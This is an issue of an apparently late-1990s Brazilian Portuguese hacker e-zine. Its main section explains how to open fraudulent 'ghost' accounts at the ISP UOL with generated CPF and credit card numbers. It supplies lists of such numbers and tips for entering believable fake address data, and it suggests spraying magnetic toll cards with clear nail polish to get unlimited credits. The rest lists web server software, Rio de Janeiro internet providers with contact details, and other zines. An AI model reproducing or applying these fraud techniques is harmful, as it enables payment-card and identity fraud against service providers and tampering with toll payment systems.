Possibilidades como: criptografia, firewalls, autenticação e simulação de ataques, não foram discutidas pois não podem ser analisadas fora do contexto da instalação com um todo.
-------------------
1995-97 © Pangéia Informática LTDA.
9. Hack, the Art
Fazendo contas fantasmas na UOL
Numa edição passada, meu amigo Slacker mostrou como fazer contas fantasmas na Mandic. Aki, mostrarei como fazer na uol. E' bem simples.
Você precisará de um gerador de CPF e de CC(Credit Card).
Se vc não conseguir achar nenhum eu colocarei uma breve lista de numeros de CPF e CC.
CPFs:
9873484779
45434578465
26456363578
46345674664
45634377943
05134348529
CCs:
Visa:
4013 8604 7222 2342
4013 5768 7497 8519
4013 5221 8759 9378
4013 1796 6406 4747
4013 3146 7723 9537
4013 7107 2725 1887
Na data de vencimento do cartão coloque 12/99.
Ae preencha os dados direitinho, faça algo certinho tipo:
Pais: Brasil
Estado: RS
Cidade: Porto Alegre
Rua: Assis Brasil
E não:
Pais: EUA
Estado: RJ
Cidade: São Paulo
Rua: Dom Pedro II
Lembre-se de não fazer isso de casa. A porra do Anonymiser não vai te ajudar nisso.
Montando um servidor WWW
Existem vários programas disponíveis para download.
Um dos mais simples é o "Alibaba", que pode ser obtido no endereço http://www.csm.co.at/csm/alibaba.htm .
O WebSite, da O'Reilly & Associates (http://website.ora.com), é um pouco mais arrojado e conta com bons recursos de segurança.
Os dois têm versıes para Windows NT e 95.
Uma terceira alternativa é o NetWare Web Server, disponível no site da Novell ( http://corp.novell.com/announce/webserve).
Estes dados foram extraidos de uma revista.
Cartıes para a FreeWay
A alguns dias eu lí no jornal que foram extreiados os cartıes com creditos para as FreeWays (BR 290 aqui no sul).
Os cartıes são de fita magnetica e podem ser recarregados assim como os cartıes da playland (playcard). Parece que o cartão e' comprado com 25 ou 50 creditos e ao acabar e' recarregado nos mesmos lugares onde foi comprado.
Podem ser comprados na própria freeway.
Ainda não testei, mas tudo indica que os truques para deixar os créditos infinitos no playcard tb funcionam nesses cartıes.
Não se lembra?? Passe esmalte de spray incolor na fita magnetica do cartão e experimente.
10. °°°BoNuS!!!
Lista de provedores - Rio de Janeiro (2a parte)
* Provedor : MSM-Internet
Host : msm.com.br
Telefone : 2407042
2405249
Email : suporte@msm.com.br
* Provedor : Nad's BBS
Host : nads.com.br
Email : sysop@nads.com.br
* Provedor : Netfly
Host : netfly.com.br
Telefone : 5671900
Email : comercial@netfly.com.br
* Provedor : NetGate
Host : netgate.com.br
Telefone : 2539918
Email : netgate@netgate.com.br
* Provedor : NetRio
Host : netrio.com.br
Telefone : 5892029
Email : webmaster@netrio.com.br
* Provedor : Netyet
Host : netyet.com.br
Email : info@netyet.com.br
* Provedor : NetZero Provider
Host : netzero.com.br
Email : webmaster@netzero.com.br
* Provedor : NovaNet
Host : novanet.com.br
Telefone : 5311545
5311850
Email : info@novanet.com.br
* Provedor : Nutecnet do Rio de Janeiro
Host : rio.nutecnet.com.br
Telefone : 5151155
Email : suporte@rio.nutecnet.com.br
* Provedor : OpenLink
Host : openlink.com.br
Telefone : 5151202
Email : admin@openlink.com.br
* Provedor : OpusNet
Host : opusnet.com.br
Email : webmaster@opusnet.com.br
* Provedor : Pandora - Desenvolvimento de HomePages
Host : pandora.com.br
Email : info@pandora.com.br
* Provedor : PlanetWay
Host : planetway.com.br
Email : webmaster@planetway.com.br
* Provedor : Plugue
Host : plugue.com.br
Telefone : 5422092
Email : plugue@plugue.com.br
* Provedor : PontoCom
Host : pontocom.com.br
Telefone : 5431270
Email : info@ pontocom.com.br
* Provedor : Prolink
Host : prolink.com.br
Email : mailadm@prolink.com.br
* Provedor : Riolink Internet
Host : rio.com.br
Telefone : 5778899
Email : riolink@rio.com.br
* Provedor : RioNet
Host : rionet.com.br
Telefone : 5322280
2406928
Email : rionet@rionet.com.br
* Provedor : SkyNet
Host : sky.com.br
Telefone : 2868797
Email : info@sky.com.br
* Provedor : TrendNet
Host : trendnet.com.br
Email : webmaster@trendnet.com.br
* Provedor : Trip Informatica Ltda.
Host : trip.com.br
Telefone : 5562898
5563166
Email : comercial@trip.com.br
* Provedor : Tropical HiperNet Rio
Host : hipernet.com.br
Email : telecom@hipernet.com.br
* Provedor : Unikey BBS
Host : unikey.com.br
Email : webmaster@unikey.com.br
* Provedor : Uninet
Host : uninet.com.br
Telefone : 0800 221958
Email : informacao@uninet.com.br
* Provedor : Vetor
Host : vetor.com.br
Telefone : 5331370
Email : webmaster@vetor.com.br
* Provedor : Virtual Internet Provider
Host : virtual.com.br
Email : virtual@virtual.com.br
* Provedor : VisualNet
Host : visualnet.com.br
Email : vendas@visualnet.com.br
* Provedor : WorldSite
Host : worldsite.com.br
Email : webmaster@worldsite.com.br
Total : 28
Atenção!!! Os Dados contidos aki foram tirados da revista Internet Business, pois eu não moro no rio e nao sei nada dos provedores de lah.
Os telefones visto aki e na edição passada são para contato com o provedor via voz/fax e não a modem.
Desculpe pela demora(1 semana) para sair esta edição da zine.
As zines mais recentes que encontrei na inet foram:
UHB - União dos Hackers Brasileiros
http://www.dominio.uhb.org
TDK - The Death Knights
http://www.deathsdoor.com/tdk
r00t h/p/a/c
william.poa@usa.net
Falowz